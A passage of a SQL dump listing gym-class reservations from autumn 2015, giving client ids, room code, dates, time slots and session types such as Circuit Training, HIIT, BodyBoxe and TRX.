(4703, 14, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
(4704, 165, 'CTR', '2015-09-30', '19h ', '19h30', 'Circuit training'),
(4731, 138, 'CTR', '2015-10-01', '18h15', '18h45', 'Circuit Training'),
(4706, 173, 'CTR', '2015-09-30', '20h30', '21h', 'Circuit Training'),
(4707, 180, 'CTR', '2015-09-30', '20h30', '21h', 'Circuit Training'),
(4708, 30, 'CTR', '2015-09-30', '20h30', '21h', 'Circuit Training'),
(4709, 48, 'CTR', '2015-09-25', '17h30', '18h', 'TRX'),
(4710, 31, 'CTR', '2015-09-29', '18h15', '18h45', 'Circuit Training'),
(4711, 48, 'CTR', '2015-09-28', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4712, 48, 'CTR', '2015-09-28', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4713, 138, 'CTR', '2015-09-28', '19h45', '20h30', 'BodyBoxe'),
(4714, 92, 'CTR', '2015-09-28', '19h45', '20h30', 'BodyBoxe'),
(4716, 102, 'CTR', '2015-09-28', '19h45', '20h30', 'BodyBoxe'),
(4717, 32, 'CTR', '2015-09-28', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4718, 32, 'CTR', '2015-09-28', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4719, 32, 'CTR', '2015-09-28', '19h45', '20h30', 'BodyBoxe'),
(4720, 187, 'CTR', '2015-10-01', '18h15', '18h45', 'Circuit Training'),
(4721, 48, 'CTR', '2015-09-29', '18h15', '18h45', 'Circuit Training'),
(4722, 100, 'CTR', '2015-10-01', '18h15', '18h45', 'Circuit Training'),
(4723, 100, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4724, 175, 'CTR', '2015-09-30', '20h30', '21h', 'Circuit Training'),
(4728, 80, 'CTR', '2015-09-30', '20h30', '21h', 'Circuit Training'),
(4727, 143, 'CTR', '2015-09-29', '18h15', '18h45', 'Circuit Training'),
(4732, 47, 'CTR', '2015-10-02', '17h30', '18h', 'TRX'),
(4733, 100, 'CTR', '2015-10-14', '19h ', '19h30', 'Circuit training'),
(4734, 29, 'CTR', '2015-10-01', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4735, 143, 'CTR', '2015-10-01', '18h15', '18h45', 'Circuit Training'),
(4736, 44, 'CTR', '2015-10-01', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4737, 48, 'CTR', '2015-10-02', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4738, 48, 'CTR', '2015-10-02', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4739, 31, 'CTR', '2015-10-02', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4740, 31, 'CTR', '2015-10-02', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4741, 63, 'CTR', '2015-10-02', '17h30', '18h', 'TRX'),
(4742, 48, 'CTR', '2015-10-05', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4743, 48, 'CTR', '2015-10-05', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4744, 44, 'CTR', '2015-10-05', '17h30', '18h00', 'Circuit training'),
(4745, 138, 'CTR', '2015-10-05', '19h45', '20h30', 'BodyBoxe'),
(4746, 164, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4747, 14, 'CTR', '2015-10-05', '17h30', '18h00', 'Circuit training'),
(4748, 14, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4749, 30, 'CTR', '2015-10-07', '20h30', '21h', 'Circuit Training'),
(4794, 49, 'CTR', '2015-10-08', '18h15', '18h45', 'Circuit Training'),
(4751, 92, 'CTR', '2015-10-05', '19h45', '20h30', 'BodyBoxe'),
(4752, 32, 'CTR', '2015-10-05', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4753, 32, 'CTR', '2015-10-05', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4754, 32, 'CTR', '2015-10-05', '19h45', '20h30', 'BodyBoxe'),
(4755, 41, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4799, 41, 'CTR', '2015-10-12', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4757, 48, 'CTR', '2015-10-06', '18h15', '18h45', 'Circuit Training'),
(4758, 190, 'CTR', '2015-10-06', '18h15', '18h45', 'Circuit Training'),
(4759, 180, 'CTR', '2015-10-07', '20h30', '21h', 'Circuit Training'),
(4760, 173, 'CTR', '2015-10-07', '20h30', '21h', 'Circuit Training'),
(4783, 180, 'CTR', '2015-10-14', '20h30', '21h', 'Circuit Training'),
(4784, 173, 'CTR', '2015-10-14', '20h30', '21h', 'Circuit Training'),
(4763, 132, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4764, 187, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4765, 168, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4766, 92, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4767, 80, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4768, 189, 'CTR', '2015-10-07', '17h30', '18h', 'Circuit training'),
(4770, 143, 'CTR', '2015-10-06', '18h15', '18h45', 'Circuit Training'),
(4771, 140, 'CTR', '2015-10-06', '18h15', '18h45', 'Circuit Training'),
(4772, 32, 'CTR', '2015-10-06', '18h15', '18h45', 'Circuit Training'),
(4773, 100, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4774, 60, 'CTR', '2015-10-07', '20h30', '21h', 'Circuit Training'),
(4775, 49, 'CTR', '2015-10-07', '17h30', '18h', 'Circuit training'),
(4776, 139, 'CTR', '2015-10-07', '17h30', '18h', 'Circuit training'),
(4777, 4, 'CTR', '2015-10-07', '17h30', '18h', 'Circuit training'),
(4778, 165, 'CTR', '2015-10-07', '19h ', '19h30', 'Circuit training'),
(4779, 187, 'CTR', '2015-10-14', '19h ', '19h30', 'Circuit training'),
(4780, 187, 'CTR', '2015-10-08', '18h15', '18h45', 'Circuit Training'),
(4781, 187, 'CTR', '2015-10-15', '18h15', '18h45', 'Circuit Training'),
(4782, 187, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4785, 30, 'CTR', '2015-10-14', '20h30', '21h', 'Circuit Training'),
(4819, 179, 'CTR', '2015-10-14', '20h30', '21h', 'Circuit Training'),
(4809, 14, 'CTR', '2015-10-12', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4788, 165, 'CTR', '2015-10-14', '19h ', '19h30', 'Circuit training'),
(4789, 164, 'CTR', '2015-10-14', '19h ', '19h30', 'Circuit training'),
(4790, 132, 'CTR', '2015-10-14', '19h ', '19h30', 'Circuit training'),
(4791, 41, 'CTR', '2015-10-14', '19h ', '19h30', 'Circuit training'),
(4792, 92, 'CTR', '2015-10-14', '19h ', '19h30', 'Circuit training'),
(4793, 93, 'CTR', '2015-10-08', '18h15', '18h45', 'Circuit Training'),
(4796, 105, 'CTR', '2015-10-08', '18h15', '18h45', 'Circuit Training'),
(4797, 143, 'CTR', '2015-10-08', '18h15', '18h45', 'Circuit Training'),
(4800, 41, 'CTR', '2015-10-12', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4801, 63, 'CTR', '2015-10-09', '17h30', '18h', 'TRX'),
(4802, 47, 'CTR', '2015-10-09', '17h30', '18h', 'TRX'),
(4803, 181, 'CTR', '2015-10-15', '18h15', '18h45', 'Circuit Training'),
(4804, 181, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4805, 181, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4806, 138, 'CTR', '2015-10-12', '19h45', '20h30', 'BodyBoxe'),
(4807, 92, 'CTR', '2015-10-12', '19h45', '20h30', 'BodyBoxe'),
(4808, 191, 'CTR', '2015-10-13', '18h15', '18h45', 'Circuit Training'),
(4810, 14, 'CTR', '2015-10-12', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4811, 42, 'CTR', '2015-10-12', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4812, 42, 'CTR', '2015-10-12', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4813, 32, 'CTR', '2015-10-12', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4814, 32, 'CTR', '2015-10-12', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4815, 32, 'CTR', '2015-10-12', '19h45', '20h30', 'BodyBoxe'),
(4816, 190, 'CTR', '2015-10-13', '18h15', '18h45', 'Circuit Training'),
(4839, 4, 'CTR', '2015-10-15', '18h15', '18h45', 'Circuit Training'),
(4827, 41, 'CTR', '2015-10-15', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4820, 184, 'CTR', '2015-10-14', '20h30', '21h', 'Circuit Training'),
(4821, 182, 'CTR', '2015-10-14', '20h30', '21h', 'Circuit Training'),
(4822, 143, 'CTR', '2015-10-13', '18h15', '18h45', 'Circuit Training'),
(4824, 49, 'CTR', '2015-10-14', '17h30', '18h', 'Circuit training'),
(4825, 47, 'CTR', '2015-10-14', '17h30', '18h', 'Circuit training'),
(4826, 187, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4828, 140, 'CTR', '2015-10-14', '17h30', '18h', 'Circuit training'),
(4829, 63, 'CTR', '2015-10-14', '17h30', '18h', 'Circuit training'),
(4830, 105, 'CTR', '2015-10-15', '17h30', '18h', 'C.A.F (Cuisses-Abdos-Fessiers)'),
(4831, 192, 'CTR', '2015-10-16', '17h30', '18h', 'TRX'),
(4832, 92, 'CTR', '2015-10-19', '19h45', '20h30', 'BodyBoxe'),
(4833, 92, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4834, 100, 'CTR', '2015-10-15', '18h15', '18h45', 'Circuit Training'),
(4835, 93, 'CTR', '2015-10-15', '18h15', '18h45', 'Circuit Training'),
(4836, 191, 'CTR', '2015-10-20', '18h15', '18h45', 'Circuit Training'),
(4837, 191, 'CTR', '2015-10-22', '18h15', '18h45', 'Circuit Training'),
(4838, 49, 'CTR', '2015-10-15', '18h15', '18h45', 'Circuit Training'),
(4840, 143, 'CTR', '2015-10-15', '18h15', '18h45', 'Circuit Training'),
(4841, 48, 'CTR', '2015-10-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4842, 48, 'CTR', '2015-10-16', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4843, 180, 'CTR', '2015-10-21', '20h30', '21h', 'Circuit Training'),
(4874, 44, 'CTR', '2015-10-20', '18h15', '18h45', 'Circuit Training'),
(4879, 139, 'CTR', '2015-10-21', '17h30', '18h', 'Circuit training'),
(4846, 80, 'CTR', '2015-10-21', '20h30', '21h', 'Circuit Training'),
(4847, 41, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4881, 179, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4849, 164, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4850, 165, 'CTR', '2015-10-21', '19h ', '19h30', 'Circuit training'),
(4893, 179, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4852, 49, 'CTR', '2015-10-21', '17h30', '18h', 'Circuit training'),
(4908, 48, 'CTR', '2015-10-23', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4854, 106, 'CTR', '2015-10-19', '19h45', '20h30', 'BodyBoxe'),
(4855, 60, 'CTR', '2015-10-21', '20h30', '21h', 'Circuit Training'),
(4856, 138, 'CTR', '2015-10-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4857, 138, 'CTR', '2015-10-16', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4858, 4, 'CTR', '2015-10-16', '17h30', '18h', 'TRX'),
(4859, 138, 'CTR', '2015-10-19', '19h45', '20h30', 'BodyBoxe'),
(4860, 48, 'CTR', '2015-10-19', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4861, 48, 'CTR', '2015-10-19', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4862, 14, 'CTR', '2015-10-19', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4863, 14, 'CTR', '2015-10-19', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4864, 105, 'CTR', '2015-10-19', '17h30', '18h00', 'Circuit training'),
(4865, 130, 'CTR', '2015-10-19', '17h30', '18h00', 'Circuit training'),
(4866, 143, 'CTR', '2015-10-19', '17h30', '18h00', 'Circuit training'),
(4867, 48, 'CTR', '2015-10-20', '18h15', '18h45', 'Circuit Training'),
(4868, 192, 'CTR', '2015-10-20', '18h15', '18h45', 'Circuit Training'),
(4869, 192, 'CTR', '2015-10-23', '17h30', '18h', 'TRX'),
(4870, 192, 'CTR', '2015-10-23', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4871, 80, 'CTR', '2015-10-21', '17h30', '18h', 'Circuit training'),
(4872, 80, 'CTR', '2015-10-21', '18h15', '18h45', 'Réservé sportifs'),
(4873, 80, 'CTR', '2015-10-21', '18h15', '18h45', 'Réservé sportifs'),
(4875, 138, 'CTR', '2015-10-20', '18h15', '18h45', 'Circuit Training'),
(4876, 80, 'CTR', '2015-10-20', '18h15', '18h45', 'Circuit Training'),
(4877, 93, 'CTR', '2015-10-20', '18h15', '18h45', 'Circuit Training'),
(4880, 100, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4882, 140, 'CTR', '2015-10-21', '17h30', '18h', 'Circuit training'),
(4883, 4, 'CTR', '2015-10-21', '17h30', '18h', 'Circuit training'),
(4884, 44, 'CTR', '2015-10-22', '18h15', '18h45', 'Circuit Training'),
(4887, 92, 'CTR', '2015-10-26', '19h45', '20h30', 'BodyBoxe'),
(4886, 92, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4888, 4, 'CTR', '2015-10-22', '18h15', '18h45', 'Circuit Training'),
(4889, 143, 'CTR', '2015-10-22', '18h15', '18h45', 'Circuit Training'),
(4890, 187, 'CTR', '2015-10-22', '18h15', '18h45', 'Circuit Training');
INSERT INTO `reservation_reservation_bck` (`id`, `id_client`, `id_salle`, `date`, `heure_deb`, `heure_fin`, `type_seance`) VALUES
(4891, 105, 'CTR', '2015-10-22', '18h15', '18h45', 'Circuit Training'),
(4892, 28, 'CTR', '2015-10-23', '17h30', '18h', 'TRX'),
(4894, 14, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4895, 165, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4896, 164, 'CTR', '2015-10-28', '19h ', '19h30', 'Circuit training'),
(4897, 173, 'CTR', '2015-10-28', '17h30', '18h', 'Circuit training'),
(4898, 139, 'CTR', '2015-10-28', '17h30', '18h', 'Circuit training'),
(4899, 49, 'CTR', '2015-10-28', '17h30', '18h', 'Circuit training'),
(4900, 194, 'CTR', '2015-10-28', '17h30', '18h', 'Circuit training'),
(4909, 48, 'CTR', '2015-10-23', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4903, 180, 'CTR', '2015-10-28', '20h30', '21h', 'Circuit Training'),
(4913, 70, 'CTR', '2015-10-28', '17h30', '18h', 'Circuit training'),
(4905, 60, 'CTR', '2015-10-28', '20h30', '21h', 'Circuit Training'),
(4906, 195, 'CTR', '2015-10-28', '18h15', '18h45', 'Réservé sportifs'),
(4907, 195, 'CTR', '2015-10-28', '18h15', '18h45', 'Réservé sportifs'),
(4910, 175, 'CTR', '2015-10-28', '20h30', '21h', 'Circuit Training'),
(4911, 175, 'CTR', '2015-10-28', '20h30', '21h', 'Circuit Training'),
(4912, 196, 'CTR', '2015-10-28', '20h30', '21h', 'Circuit Training'),
(4914, 138, 'CTR', '2015-10-27', '18h15', '18h45', 'Circuit Training'),
(4915, 106, 'CTR', '2015-10-26', '19h45', '20h30', 'BodyBoxe'),
(4916, 48, 'CTR', '2015-10-26', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4917, 48, 'CTR', '2015-10-26', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4918, 44, 'CTR', '2015-10-26', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4941, 93, 'CTR', '2015-10-27', '18h15', '18h45', 'Circuit Training'),
(4926, 14, 'CTR', '2015-10-26', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4925, 14, 'CTR', '2015-10-26', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4922, 191, 'CTR', '2015-10-27', '18h15', '18h45', 'Circuit Training'),
(4923, 191, 'CTR', '2015-10-29', '18h15', '18h45', 'Circuit Training'),
(4968, 44, 'CTR', '2015-11-02', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4966, 30, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4929, 132, 'CTR', '2015-10-28', '20h30', '21h', 'Circuit Training'),
(4930, 56, 'CTR', '2015-10-26', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4931, 56, 'CTR', '2015-10-26', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4932, 56, 'CTR', '2015-10-28', '20h30', '21h', 'Circuit Training'),
(4933, 32, 'CTR', '2015-10-26', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4934, 32, 'CTR', '2015-10-26', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4935, 32, 'CTR', '2015-10-26', '19h45', '20h30', 'BodyBoxe'),
(4936, 37, 'CTR', '2015-10-26', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4937, 37, 'CTR', '2015-10-26', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4938, 192, 'CTR', '2015-10-27', '18h15', '18h45', 'Circuit Training'),
(4973, 101, 'CTR', '2015-11-02', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4965, 106, 'CTR', '2015-11-02', '19h45', '20h30', 'BodyBoxe'),
(4943, 120, 'CTR', '2015-10-28', '17h30', '18h', 'Circuit training'),
(4944, 4, 'CTR', '2015-10-28', '17h30', '18h', 'Circuit training'),
(4945, 44, 'CTR', '2015-10-29', '18h15', '18h45', 'Circuit Training'),
(4946, 101, 'CTR', '2015-10-29', '18h15', '18h45', 'Circuit Training'),
(4947, 194, 'CTR', '2015-11-04', '17h30', '18h', 'Circuit training'),
(4948, 201, 'CTR', '2015-11-04', '17h30', '18h', 'Circuit training'),
(4949, 195, 'CTR', '2015-11-04', '18h15', '18h45', 'Réservé sportifs'),
(5000, 192, 'CTR', '2015-11-05', '18h15', '18h45', 'Circuit Training'),
(4951, 175, 'CTR', '2015-11-04', '18h15', '18h45', 'Réservé sportifs'),
(4952, 14, 'CTR', '2015-11-04', '19h ', '19h30', 'Circuit training'),
(4953, 164, 'CTR', '2015-11-04', '19h ', '19h30', 'Circuit training'),
(4954, 165, 'CTR', '2015-11-04', '19h ', '19h30', 'Circuit training'),
(4955, 92, 'CTR', '2015-11-04', '19h ', '19h30', 'Circuit training'),
(4972, 101, 'CTR', '2015-11-02', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4957, 173, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4958, 196, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4959, 180, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4960, 60, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4961, 132, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4962, 200, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4963, 80, 'CTR', '2015-11-04', '20h30', '21h', 'Circuit Training'),
(4964, 105, 'CTR', '2015-10-29', '18h15', '18h45', 'Circuit Training'),
(4971, 44, 'CTR', '2015-11-02', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4974, 192, 'CTR', '2015-11-03', '18h15', '18h45', 'Circuit Training'),
(4975, 192, 'CTR', '2015-11-06', '17h30', '18h', 'TRX'),
(4976, 192, 'CTR', '2015-11-06', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5021, 28, 'CTR', '2015-11-06', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4978, 138, 'CTR', '2015-11-02', '19h45', '20h30', 'BodyBoxe'),
(5006, 28, 'CTR', '2015-11-06', '17h30', '18h', 'TRX'),
(4981, 202, 'CTR', '2015-11-02', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4982, 92, 'CTR', '2015-11-02', '19h45', '20h30', 'BodyBoxe'),
(4983, 191, 'CTR', '2015-11-05', '18h15', '18h45', 'Circuit Training'),
(4984, 4, 'CTR', '2015-11-02', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4985, 32, 'CTR', '2015-11-02', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4986, 32, 'CTR', '2015-11-02', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(4987, 14, 'CTR', '2015-11-02', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(4988, 120, 'CTR', '2015-11-04', '17h30', '18h', 'Circuit training'),
(4989, 48, 'CTR', '2015-11-03', '18h15', '18h45', 'Circuit Training'),
(4990, 181, 'CTR', '2015-11-04', '19h ', '19h30', 'Circuit training'),
(4991, 181, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(4992, 32, 'CTR', '2015-11-03', '18h15', '18h45', 'Circuit Training'),
(4993, 179, 'CTR', '2015-11-04', '19h ', '19h30', 'Circuit training'),
(4994, 143, 'CTR', '2015-11-03', '18h15', '18h45', 'Circuit Training'),
(4997, 154, 'CTR', '2015-11-04', '17h30', '18h', 'Circuit training'),
(4999, 44, 'CTR', '2015-11-05', '18h15', '18h45', 'Circuit Training'),
(5004, 92, 'CTR', '2015-11-09', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5002, 140, 'CTR', '2015-11-05', '18h15', '18h45', 'Circuit Training'),
(5003, 202, 'CTR', '2015-11-05', '18h15', '18h45', 'Circuit Training'),
(5005, 92, 'CTR', '2015-11-09', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5007, 28, 'CTR', '2015-11-12', '12h45', '13h15', 'Circuit training'),
(5008, 105, 'CTR', '2015-11-05', '18h15', '18h45', 'Circuit Training'),
(5009, 106, 'CTR', '2015-11-09', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5010, 106, 'CTR', '2015-11-09', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5013, 193, 'CTR', '2015-11-09', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5014, 193, 'CTR', '2015-11-09', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5015, 138, 'CTR', '2015-11-09', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5016, 138, 'CTR', '2015-11-09', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5022, 203, 'CTR', '2015-11-09', '17h30', '18h00', 'Circuit training'),
(5076, 31, 'CTR', '2015-11-17', '18h15', '18h45', 'Circuit Training'),
(5019, 14, 'CTR', '2015-11-09', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5020, 14, 'CTR', '2015-11-09', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5023, 30, 'CTR', '2015-11-06', '17h30', '18h', 'TRX'),
(5024, 48, 'CTR', '2015-11-06', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5025, 48, 'CTR', '2015-11-06', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5026, 37, 'CTR', '2015-11-09', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5027, 37, 'CTR', '2015-11-09', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5028, 28, 'CTR', '2015-11-12', '12h45', '13h15', 'Circuit training'),
(5029, 44, 'CTR', '2015-11-09', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5030, 44, 'CTR', '2015-11-09', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5031, 48, 'CTR', '2015-11-09', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5032, 48, 'CTR', '2015-11-09', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5033, 57, 'CTR', '2015-11-09', '17h30', '18h00', 'Circuit training'),
(5034, 26, 'CTR', '2015-11-09', '17h30', '18h00', 'Circuit training'),
(5035, 32, 'CTR', '2015-11-09', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5036, 32, 'CTR', '2015-11-09', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5037, 32, 'CTR', '2015-11-09', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5038, 32, 'CTR', '2015-11-09', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5039, 31, 'CTR', '2015-11-10', '18h15', '18h45', 'Circuit Training'),
(5040, 48, 'CTR', '2015-11-10', '18h15', '18h45', 'Circuit Training'),
(5041, 169, 'CTR', '2015-11-10', '18h15', '18h45', 'Circuit Training'),
(5042, 169, 'CTR', '2015-11-13', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5043, 169, 'CTR', '2015-11-13', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5044, 93, 'CTR', '2015-11-10', '18h15', '18h45', 'Circuit Training'),
(5045, 182, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(5046, 180, 'CTR', '2015-11-11', '20h30', '21h', 'Circuit Training'),
(5047, 173, 'CTR', '2015-11-11', '20h30', '21h', 'Circuit Training'),
(5048, 60, 'CTR', '2015-11-11', '20h30', '21h', 'Circuit Training'),
(5068, 35, 'CTR', '2015-11-12', '12h45', '13h15', 'Circuit training'),
(5051, 44, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(5052, 192, 'CTR', '2015-11-10', '18h15', '18h45', 'Circuit Training'),
(5055, 37, 'CTR', '2015-11-11', '17h30', '18h', 'Circuit training'),
(5054, 143, 'CTR', '2015-11-12', '12h45', '13h15', 'Circuit training'),
(5056, 201, 'CTR', '2015-11-11', '17h30', '18h', 'Circuit training'),
(5057, 49, 'CTR', '2015-11-12', '12h45', '13h15', 'Circuit training'),
(5058, 184, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(5059, 183, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(5060, 179, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(5061, 195, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(5062, 3, 'CTR', '2015-11-11', '20h30', '21h', 'Circuit Training'),
(5075, 29, 'CTR', '2015-11-12', '18h15', '18h45', 'Circuit Training'),
(5064, 80, 'CTR', '2015-11-12', '12h45', '13h15', 'Circuit training'),
(5065, 101, 'CTR', '2015-11-11', '19h ', '19h30', 'Circuit training'),
(5066, 27, 'CTR', '2015-11-11', '17h30', '18h', 'Circuit training'),
(5067, 147, 'CTR', '2015-11-11', '17h30', '18h', 'Circuit training'),
(5069, 140, 'CTR', '2015-11-11', '17h30', '18h', 'Circuit training'),
(5070, 175, 'CTR', '2015-11-11', '20h30', '21h', 'Circuit Training'),
(5072, 187, 'CTR', '2015-11-12', '18h15', '18h45', 'Circuit Training'),
(5073, 4, 'CTR', '2015-11-12', '18h15', '18h45', 'Circuit Training'),
(5074, 195, 'CTR', '2015-11-12', '12h45', '13h15', 'Circuit training'),
(5077, 37, 'CTR', '2015-11-13', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5078, 37, 'CTR', '2015-11-13', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5079, 92, 'CTR', '2015-11-13', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5080, 92, 'CTR', '2015-11-13', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5081, 92, 'CTR', '2015-11-16', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5082, 92, 'CTR', '2015-11-16', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5083, 48, 'CTR', '2015-11-13', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5084, 48, 'CTR', '2015-11-13', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5085, 193, 'CTR', '2015-11-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5086, 193, 'CTR', '2015-11-16', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
